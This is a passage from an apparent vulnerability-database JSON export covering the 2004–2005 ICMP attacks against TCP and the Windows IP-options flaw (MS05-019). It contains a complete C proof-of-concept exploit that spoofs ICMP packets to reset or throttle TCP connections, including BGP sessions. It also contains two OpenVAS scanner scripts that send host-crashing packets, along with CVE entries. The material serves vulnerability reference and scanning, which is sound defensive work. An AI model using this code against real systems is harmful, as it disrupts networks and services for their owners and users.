(CRS-1) 3.x\r\n* - Cisco ONS 15000 Series\r\n* - Cisco PIX 6.x\r\n* - Cisco SAN-OS 1.x (MDS 9000 Switches)\r\n* - AIX 5.x\r\n* - Windows Server 2003\r\n* - Windows XP SP2\r\n* - Windows XP 
SP1\r\n* - Windows 2000 SP4\r\n* - Windows 2000 SP3\r\n* ...\r\n*\r\n* ---------------------------------------------------------------------\r\n* Description:\r\n* A denial of service vulnerability exists that could allow an\r\n* attacker to send a specially crafted Internet Control Message\r\n* Protocol (ICMP) message to an affected system. An attacker who\r\n* successfully exploited this vulnerability could cause the affected\r\n* system to reset existing TCP connections, reduce the throughput\r\n* in existing TCP connections, or consume large amounts of CPU and\r\n* memory resources.\r\n* (CAN-2004-0790, CAN-2004-0791, CAN-2004-1060)\r\n*\r\n* ---------------------------------------------------------------------\r\n* Solution:\r\n* http://www.microsoft.com/technet/security/Bulletin/MS05-019.mspx\r\n* http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml\r\n*\r\n* Other References:\r\n* http://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html\r\n* http://www.kb.cert.org/vuls/id/222750\r\n*\r\n* ---------------------------------------------------------------------\r\n* Tested on:\r\n* - Windows Server 2003\r\n* - Windows XP SP1\r\n* - Windows 2000 SP4\r\n* - Cisco IOS 11.x\r\n*\r\n* ---------------------------------------------------------------------\r\n* Compile:\r\n*\r\n* Win32/VC++ : cl -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\r\n* Win32/cygwin: gcc -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\r\n* Linux : gcc -o HOD-icmp-attacks-poc HOD-icmp-attacks-poc.c\r\n*\r\n* ---------------------------------------------------------------------\r\n* Examples:\r\n*\r\n* client <---> router <---> router <---> server\r\n*\r\n* CLIENT <---> SERVER\r\n*\r\n* HOD-icmp.exe -fi:serverIP -ti:clientIP -fp:80 -tp:1023 -a:1\r\n* (abort the connection)\r\n*\r\n* HOD-icmp.exe -fi:serverIP -ti:clientIP -fp:80 -tp:1023 -a:2\r\n* (slow down the transmission rate for traffic)\r\n*\r\n*\r\n* ROUTER1 <---> ROUTER2\r\n*\r\n* HOD-icmp.exe -fi:routerIP2 -ti:routerIP1 
-fp:179 -a:1\r\n* (DoS Cisco BGP Connections)\r\n*\r\n* HOD-icmp.exe -fi:routerIP2 -ti:routerIP1 -fp:80 -a:2\r\n* (slow down the transmission rate for traffic)\r\n*\r\n* ---------------------------------------------------------------------\r\n*\r\n* This is provided as proof-of-concept code only for educational\r\n* purposes and testing by authorized individuals with permission\r\n* to do so.\r\n*\r\n*/\r\n\r\n/* #define _WIN32 */\r\n\r\n#ifdef _WIN32\r\n#pragma comment(lib,\"ws2_32\")\r\n#pragma pack(1)\r\n#define WIN32_LEAN_AND_MEAN\r\n#include <winsock2.h>\r\n/* IP_HDRINCL */\r\n#include <ws2tcpip.h>\r\n\r\n#else\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <sys/socket.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <sys/timeb.h>\r\n#endif\r\n\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\n#define MAX_PACKET 4096\r\n\r\n#define DEFAULT_PORT 80\r\n#define DEFAULT_IP \"192.168.0.1\"\r\n#define DEFAULT_COUNT 1\r\n\r\n/* Define the IP header */\r\ntypedef struct ip_hdr {\r\n unsigned char ip_verlen; /* IP version & length */\r\n unsigned char ip_tos; /* IP type of service */\r\n unsigned short ip_totallength; /* Total length */\r\n unsigned short ip_id; /* Unique identifier */\r\n unsigned short ip_offset; /* Fragment offset field */\r\n unsigned char ip_ttl; /* Time to live */\r\n unsigned char ip_protocol; /* Protocol */\r\n unsigned short ip_checksum; /* IP checksum */\r\n unsigned int ip_srcaddr; /* Source address */\r\n unsigned int ip_destaddr; /* Destination address */\r\n} IP_HDR, *PIP_HDR;\r\n\r\n/* Define the ICMP header */\r\n/* Destination Unreachable Message */\r\ntypedef struct icmp_hdr {\r\n unsigned char type; /* Type */\r\n unsigned char code; /* Code */\r\n unsigned short checksum; /* Checksum */\r\n unsigned long unused; /* Unused */\r\n} ICMP_HDR, *PICMP_HDR;\r\n\r\n/* 64 bits of Original Data Datagram (TCP header) */\r\nchar msg[] 
=\r\n\"\\x00\\x50\" /* Source port */\r\n\"\\x00\\x50\" /* Destination port */\r\n\"\\x23\\x48\\x4f\\x44\";\r\n\r\n/* globals */\r\nunsigned long dwToIP, /* IP to send to */\r\n dwFromIP; /* IP to send from (spoof) */\r\nunsigned short iToPort, /* Port to send to */\r\n iFromPort; /* Port to send from (spoof) */\r\nunsigned long dwCount; /* Number of times to send */\r\nunsigned long Attack;\r\n\r\nvoid\r\nusage(char *progname) {\r\n printf(\"Usage:\\n\\n\");\r\n printf(\"%s <-fi:SRC-IP> <-ti:VICTIM-IP> <-fi:SRC-PORT> [-tp:int] [-a:int] [-n:int]\\n\\n\", progname);\r\n printf(\" -fi:IP From (sender) IP address\\n\");\r\n printf(\" -ti:IP To (target) IP address\\n\");\r\n printf(\" -fp:int Target open TCP port number\\n\");\r\n printf(\" (for example - 21, 25, 80)\\n\");\r\n printf(\" -tp:int Inicial value for bruteforce (sender) TCP port number\\n\");\r\n printf(\" (default: 0 = range of ports 0-65535)\\n\");\r\n printf(\" -n:int Number of packets\\n\\n\");\r\n printf(\" -a:int ICMP attacks:\\n\");\r\n printf(\" 1 - Blind connection-reset attack\\n\");\r\n printf(\" (ICMP protocol unreachable)\\n\");\r\n printf(\" 2 - Path MTU discovery attack\\n\");\r\n printf(\" (slow down the transmission rate)\\n\");\r\n printf(\" 3 - ICMP Source Quench attack\\n\");\r\n exit(1);\r\n}\r\n\r\nvoid\r\nValidateArgs(int argc, char **argv)\r\n{\r\n int i;\r\n\r\n iToPort = 0;\r\n iFromPort = DEFAULT_PORT;\r\n dwToIP = inet_addr(DEFAULT_IP);\r\n dwFromIP = inet_addr(DEFAULT_IP);\r\n dwCount = DEFAULT_COUNT;\r\n Attack = 1;\r\n\r\n for (i = 1; i < argc; i++) {\r\n if ((argv[i][0] == '-') || (argv[i][0] == '/')) {\r\n switch (tolower(argv[i][1])) {\r\n case 'f':\r\n switch (tolower(argv[i][2])) {\r\n case 'p':\r\n if (strlen(argv[i]) > 4)\r\n iFromPort = atoi(&argv[i][4]);\r\n break;\r\n case 'i':\r\n if (strlen(argv[i]) > 4)\r\n dwFromIP = inet_addr(&argv[i][4]);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n break;\r\n }\r\n break;\r\n case 't':\r\n switch (tolower(argv[i][2])) 
{\r\n case 'p':\r\n if (strlen(argv[i]) > 4)\r\n iToPort = atoi(&argv[i][4]);\r\n break;\r\n case 'i':\r\n if (strlen(argv[i]) > 4)\r\n dwToIP = inet_addr(&argv[i][4]);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n break;\r\n }\r\n break;\r\n case 'n':\r\n if (strlen(argv[i]) > 3)\r\n dwCount = atol(&argv[i][3]);\r\n break;\r\n case 'a':\r\n if (strlen(argv[i]) > 3)\r\n Attack = atol(&argv[i][3]);\r\n if ((Attack > 3) || (Attack < 1))\r\n usage(argv[0]);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n break;\r\n }\r\n }\r\n }\r\n return;\r\n}\r\n\r\n/* This function calculates the 16-bit one's complement sum */\r\n/* for the supplied buffer */\r\nunsigned short\r\nchecksum(unsigned short *buffer, int size)\r\n{\r\n unsigned long cksum = 0;\r\n\r\n while (size > 1) {\r\n cksum += *buffer++;\r\n size -= sizeof(unsigned short);\r\n }\r\n if (size) {\r\n cksum += *(unsigned char *)buffer;\r\n }\r\n cksum = (cksum >> 16) + (cksum & 0xffff);\r\n cksum += (cksum >>16);\r\n\r\n return (unsigned short)(~cksum);\r\n}\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\r\n#ifdef _WIN32\r\n WSADATA wsd;\r\n#endif\r\n int s;\r\n#ifdef _WIN32\r\n BOOL bOpt;\r\n#else\r\n int bOpt;\r\n#endif\r\n struct sockaddr_in remote;\r\n IP_HDR ipHdr,\r\n ipHdrInc;\r\n ICMP_HDR icmpHdr;\r\n int ret;\r\n unsigned long i, p;\r\n unsigned short iTotalSize,\r\n iIPVersion,\r\n iIPSize,\r\n p2,\r\n cksum = 0;\r\n char buf[MAX_PACKET],\r\n *ptr = NULL;\r\n#ifdef _WIN32\r\n IN_ADDR addr;\r\n#else\r\n struct sockaddr_in addr;\r\n#endif\r\n\r\n printf(\"\\n (MS05-019) (CISCO:20050412)\\n\");\r\n printf(\" ICMP attacks against TCP (Proof-of-Concept)\\n\\n\");\r\n printf(\" Copyright (c) 2004-2005 .: houseofdabus :.\\n\\n\\n\");\r\n\r\n if (argc < 3) usage(argv[0]);\r\n\r\n /* Parse command line arguments and print them out */\r\n ValidateArgs(argc, argv);\r\n#ifdef _WIN32\r\n addr.S_un.S_addr = dwFromIP;\r\n printf(\"[*] From IP: <%s>, port: %d\\n\", inet_ntoa(addr), iFromPort);\r\n addr.S_un.S_addr = 
dwToIP;\r\n printf(\"[*] To IP: <%s>, port: %d\\n\", inet_ntoa(addr), iToPort);\r\n printf(\"[*] Count: %d\\n\", dwCount);\r\n#else\r\n addr.sin_addr.s_addr = dwFromIP;\r\n printf(\"[*] From IP: <%s>, port: %d\\n\", inet_ntoa(addr.sin_addr), iFromPort);\r\n addr.sin_addr.s_addr = dwToIP;\r\n printf(\"[*] To IP: <%s>, port: %d\\n\", inet_ntoa(addr.sin_addr), iToPort);\r\n printf(\"[*] Count: %d\\n\", dwCount);\r\n#endif\r\n\r\n#ifdef _WIN32\r\n if (WSAStartup(MAKEWORD(2,2), &wsd) != 0) {\r\n printf(\"[-] WSAStartup() failed: %d\\n\", GetLastError());\r\n return -1;\r\n }\r\n#endif\r\n /* Creating a raw socket */\r\n s = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);\r\n#ifdef _WIN32\r\n if (s == INVALID_SOCKET) {\r\n#else\r\n if (s < 0) {\r\n#endif\r\n printf(\"[-] socket() failed\\n\");\r\n return -1;\r\n }\r\n\r\n /* Enable the IP header include option */\r\n#ifdef _WIN32\r\n bOpt = TRUE;\r\n#else\r\n bOpt = 1;\r\n#endif\r\n ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));\r\n#ifdef _WIN32\r\n if (ret == SOCKET_ERROR) {\r\n printf(\"[-] setsockopt(IP_HDRINCL) failed: %d\\n\", WSAGetLastError());\r\n return -1;\r\n }\r\n#endif\r\n\r\n /* Initalize the IP header */\r\n iTotalSize = sizeof(ipHdr) + sizeof(icmpHdr) + sizeof(msg)-1 + sizeof(ipHdrInc);\r\n\r\n iIPVersion = 4;\r\n iIPSize = sizeof(ipHdr) / sizeof(unsigned long);\r\n\r\n ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize;\r\n ipHdr.ip_tos = 0; /* IP type of service */\r\n /* Total packet len */\r\n ipHdr.ip_totallength = htons(iTotalSize);\r\n ipHdr.ip_id = htons(42451); /* Unique identifier */\r\n ipHdr.ip_offset = 0; /* Fragment offset field */\r\n ipHdr.ip_ttl = 255; /* Time to live */\r\n ipHdr.ip_protocol = 0x1; /* Protocol(ICMP) */\r\n ipHdr.ip_checksum = 0; /* IP checksum */\r\n ipHdr.ip_srcaddr = dwFromIP; /* Source address */\r\n ipHdr.ip_destaddr = dwToIP; /* Destination address */\r\n\r\n ipHdrInc.ip_verlen = (iIPVersion << 4) | iIPSize;\r\n ipHdrInc.ip_tos = 0; /* IP type of 
service */\r\n /* Total packet len */\r\n ipHdrInc.ip_totallength = htons(sizeof(ipHdrInc)+20);\r\n ipHdrInc.ip_id = htons(25068); /* Unique identifier */\r\n\r\n ipHdrInc.ip_offset = 0; /* Fragment offset field */\r\n ipHdrInc.ip_ttl = 255; /* Time to live */\r\n ipHdrInc.ip_protocol = 0x6; /* Protocol(TCP) */\r\n ipHdrInc.ip_checksum = 0; /* IP checksum */\r\n ipHdrInc.ip_srcaddr = dwToIP; /* Source address */\r\n ipHdrInc.ip_destaddr = dwFromIP;/* Destination address */\r\n\r\n /* Initalize the ICMP header */\r\n icmpHdr.checksum = 0;\r\n if (Attack == 1) {\r\n icmpHdr.type = 3; /* Destination Unreachable Message */\r\n icmpHdr.code = 2; /* protocol unreachable */\r\n icmpHdr.unused = 0;\r\n } else if (Attack == 2) {\r\n icmpHdr.type = 3; /* Destination Unreachable Message */\r\n icmpHdr.code = 4; /* fragmentation needed and DF set */\r\n icmpHdr.unused = 0x44000000; /* next-hop MTU - 68 */\r\n } else {\r\n icmpHdr.type = 4; /* Source Quench Message */\r\n icmpHdr.code = 0;\r\n icmpHdr.unused = 0;\r\n }\r\n\r\n memset(buf, 0, MAX_PACKET);\r\n ptr = buf;\r\n\r\n memcpy(ptr, &ipHdr, sizeof(ipHdr)); ptr += sizeof(ipHdr);\r\n memcpy(ptr, &icmpHdr, sizeof(icmpHdr)); ptr += sizeof(icmpHdr);\r\n memcpy(ptr, &ipHdrInc, sizeof(ipHdrInc)); ptr += sizeof(ipHdrInc);\r\n memcpy(ptr, msg, sizeof(msg)-1);\r\n iFromPort = htons(iFromPort);\r\n memcpy(ptr, &iFromPort, 2);\r\n\r\n remote.sin_family = AF_INET;\r\n remote.sin_port = htons(iToPort);\r\n remote.sin_addr.s_addr = dwToIP;\r\n\r\n cksum = checksum((unsigned short *)&ipHdrInc, 20);\r\n memcpy(buf+20+sizeof(icmpHdr)+10, &cksum, 2);\r\n\r\n cksum = checksum((unsigned short *)&ipHdr, 20);\r\n memcpy(buf+10, &cksum, 2);\r\n\r\n for (p = iToPort; p <= 65535; p++) {\r\n p2 = htons((short)p);\r\n memcpy((char *)(ptr+2), &p2, 2);\r\n buf[22] = 0;\r\n buf[23] = 0;\r\n cksum = checksum((unsigned short *)(buf+20), sizeof(icmpHdr)+28);\r\n memcpy(buf+20+2, &cksum, 2);\r\n\r\n for (i = 0; i < dwCount; i++) {\r\n#ifdef _WIN32\r\n ret 
= sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote,\r\n sizeof(remote));\r\n#else\r\n ret = sendto(s, buf, iTotalSize, 0, (struct sockaddr *) &remote,\r\n sizeof(remote));\r\n#endif\r\n#ifdef _WIN32\r\n if (ret == SOCKET_ERROR) {\r\n#else\r\n if (ret < 0) {\r\n#endif\r\n printf(\"[-] sendto() failed\\n\");\r\n break;\r\n }\r\n }\r\n }\r\n\r\n#ifdef _WIN32\r\n closesocket(s);\r\n WSACleanup();\r\n#endif\r\n\r\n return 0;\r\n}\r\n\r\n// milw0rm.com [2005-04-20]", "sourceHref": "https://www.exploit-db.com/download/948", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2017-10-25T14:44:40", "description": "The host is running Microsoft Windows and is prone to remote code\n execution vulnerability.", "cvss3": {}, "published": "2011-11-21T00:00:00", "type": "openvas", "title": "Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2005-0048", "CVE-2004-0230", "CVE-2005-0688", "CVE-2004-1060"], "modified": "2017-10-24T00:00:00", "id": "OPENVAS:902588", "href": "http://plugins.openvas.org/nasl.php?oid=902588", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms_windows_ip_validation_code_exec_vuln.nasl 7550 2017-10-24 12:17:52Z cfischer $\n#\n# Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR 
PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Microsoft Windows XP SP2 and prior.\n Microsoft Windows 2000 Server SP4 and prior.\n\n Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://technet.microsoft.com/en-us/security/bulletin/ms05-019\";\n\ntag_impact = \"Successful exploitation will allow attacker to cause a denial of service\n and possibly execute arbitrary code via crafted IP packets with malformed\n options.\n Impact Level: System\";\ntag_insight = \"The flaw is due to insufficient validation of IP options and can be\n exploited to cause a vulnerable system to stop responding and restart or may\n allow execution of arbitrary code by sending a specially crafted IP packet\n to a vulnerable system.\";\ntag_summary = \"The host is running Microsoft Windows and is prone to remote code\n execution vulnerability.\";\n\nif(description)\n{\n script_id(902588);\n script_version(\"$Revision: 7550 $\");\n script_cve_id(\"CVE-2005-0048\", \"CVE-2005-0688\", \"CVE-2004-0790\",\n \"CVE-2004-1060\", \"CVE-2004-0230\");\n script_bugtraq_id(13116, 13658, 13124, 10183);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 14:17:52 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-21 15:15:15 +0530 (Mon, 21 Nov 2011)\");\n script_name(\"Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability\");\n\n script_xref(name : \"URL\" , value : 
\"http://secunia.com/advisories/14512\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/22341\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/id/1013686\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/ms05-019\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/ms06-064\");\n\n script_category(ACT_KILL_HOST);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_nativelanman.nasl\", \"netbios_name_get.nasl\", \"os_detection.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"Host/runs_windows\");\n script_exclude_keys(\"SMB/samba\", \"keys/TARGET_IS_IPV6\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\nif(TARGET_IS_IPV6()){\n exit(0);\n}\n\n## Get SMB Port\nport = kb_smb_transport();\nif(!port) {\n port = 445;\n}\n\n## Check Port State\nif(!get_port_state(port)) {\n exit(0);\n}\n\n## Building Exploit\ndstaddr = get_host_ip();\nsrcaddr = this_host();\nsport = rand() % (65536 - 1024) + 1024;\n\n## IP packet with an option size 39\noptions = raw_string(0x03, 0x27, crap(data:\"G\", length:38));\n\nip = forge_ip_packet( ip_v : 4,\n ip_hl : 15,\n ip_tos : 0,\n ip_len : 20,\n ip_id : rand(),\n ip_p : IPPROTO_TCP,\n ip_ttl : 64,\n ip_off : 0,\n ip_src : srcaddr,\n data : options );\n\n\ntcp = forge_tcp_packet( ip : ip,\n th_sport : sport,\n th_dport : port,\n th_flags : TH_SYN,\n th_seq : rand(),\n th_ack : 0,\n th_x2 : 0,\n th_off : 5,\n th_win : 512,\n th_urp : 0 
);\n\n## Sending Exploit\nstart_denial();\nfor( i = 0; i < 5 ; i ++ ) {\n result = send_packet(tcp,pcap_active:FALSE);\n}\nalive = end_denial();\n\n## Confirm Host is Still Alive and Responding\nif(! alive) {\n security_message(port);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-01-08T14:04:37", "description": "The host is running Microsoft Windows and is prone to remote code\n execution vulnerability.", "cvss3": {}, "published": "2011-11-21T00:00:00", "type": "openvas", "title": "Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2005-0048", "CVE-2004-0230", "CVE-2005-0688", "CVE-2004-1060"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310902588", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902588", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902588\");\n script_version(\"2019-12-20T12:48:41+0000\");\n script_cve_id(\"CVE-2005-0048\", \"CVE-2005-0688\", \"CVE-2004-0790\", \"CVE-2004-1060\", \"CVE-2004-0230\");\n script_bugtraq_id(13116, 13658, 13124, 10183);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 12:48:41 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2011-11-21 15:15:15 +0530 (Mon, 21 Nov 2011)\");\n script_name(\"Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability\");\n script_category(ACT_KILL_HOST);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_nativelanman.nasl\", \"netbios_name_get.nasl\", \"os_detection.nasl\", \"global_settings.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"Host/runs_windows\");\n script_exclude_keys(\"SMB/samba\", \"keys/TARGET_IS_IPV6\");\n\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id/1013686\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2005/ms05-019\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/ms06-064\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to cause a denial of service\n and possibly execute arbitrary code via crafted IP packets with malformed options.\");\n\n 
script_tag(name:\"insight\", value:\"The flaw is due to insufficient validation of IP options and can be\n exploited to cause a vulnerable system to stop responding and restart or may allow execution of arbitrary\n code by sending a specially crafted IP packet to a vulnerable system.\");\n\n script_tag(name:\"summary\", value:\"The host is running Microsoft Windows and is prone to remote code\n execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows XP SP2 and prior\n\n - Microsoft Windows 2000 Server SP4 and prior\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"qod_type\", value:\"remote_probe\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\nif(TARGET_IS_IPV6() || kb_smb_is_samba())\n exit(0);\n\nport = kb_smb_transport();\nif(!port)\n port = 445;\n\nif(!get_port_state(port))\n exit(0);\n\ndstaddr = get_host_ip();\nsrcaddr = this_host();\nsport = rand() % (65536 - 1024) + 1024;\n\n## IP packet with an option size 39\noptions = raw_string(0x03, 0x27, crap(data:\"G\", length:38));\n\nip = forge_ip_packet( ip_v : 4,\n ip_hl : 15,\n ip_tos : 0,\n ip_len : 20,\n ip_id : rand(),\n ip_p : IPPROTO_TCP,\n ip_ttl : 64,\n ip_off : 0,\n ip_src : srcaddr,\n data : options );\n\ntcp = forge_tcp_packet( ip : ip,\n th_sport : sport,\n th_dport : port,\n th_flags : TH_SYN,\n th_seq : rand(),\n th_ack : 0,\n th_x2 : 0,\n th_off : 5,\n th_win : 512,\n th_urp : 0 );\n\nstart_denial();\nfor( i = 0; i < 5 ; i ++ ) {\n result = send_packet(tcp,pcap_active:FALSE);\n}\nalive = end_denial();\n\nif(! 
alive) {\n security_message(port:port);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T11:50:37", "description": "Multiple TCP/IP and ICMP implementations, when using Path MTU (PMTU) discovery (PMTUD), allow remote attackers to cause a denial of service (network throughput reduction for TCP connections) via forged ICMP (\"Fragmentation Needed and Don't Fragment was Set\") packets with a low next-hop MTU value, aka the \"Path MTU discovery attack.\" NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities.", "cvss3": {}, "published": "2004-04-12T04:00:00", "type": "cve", "title": "CVE-2004-1060", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068"], "modified": "2018-10-19T15:30:00", "cpe": ["cpe:/a:icmp:icmp:*", "cpe:/a:tcp:tcp:*"], "id": "CVE-2004-1060", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1060", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": 
["cpe:2.3:a:icmp:icmp:*:*:*:*:*:*:*:*", "cpe:2.3:a:tcp:tcp:*:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:45:51", "description": "Multiple TCP/IP and ICMP implementations allow remote attackers to cause a denial of service (reset TCP connections) via spoofed ICMP error messages, aka the \"blind connection-reset attack.\" NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities.", "cvss3": {}, "published": "2005-04-12T04:00:00", "type": "cve", "title": "CVE-2004-0790", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/o:microsoft:windows_2000:*", "cpe:/o:microsoft:windows_xp:*", "cpe:/o:microsoft:windows_98:*", "cpe:/o:sun:solaris:10.0", "cpe:/o:sun:sunos:5.7", "cpe:/o:microsoft:windows_me:*", "cpe:/o:sun:sunos:5.8", "cpe:/o:microsoft:windows_98se:*", "cpe:/o:sun:solaris:9.0", "cpe:/o:microsoft:windows_2003_server:r2"], "id": "CVE-2004-0790", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0790", "cvss": 
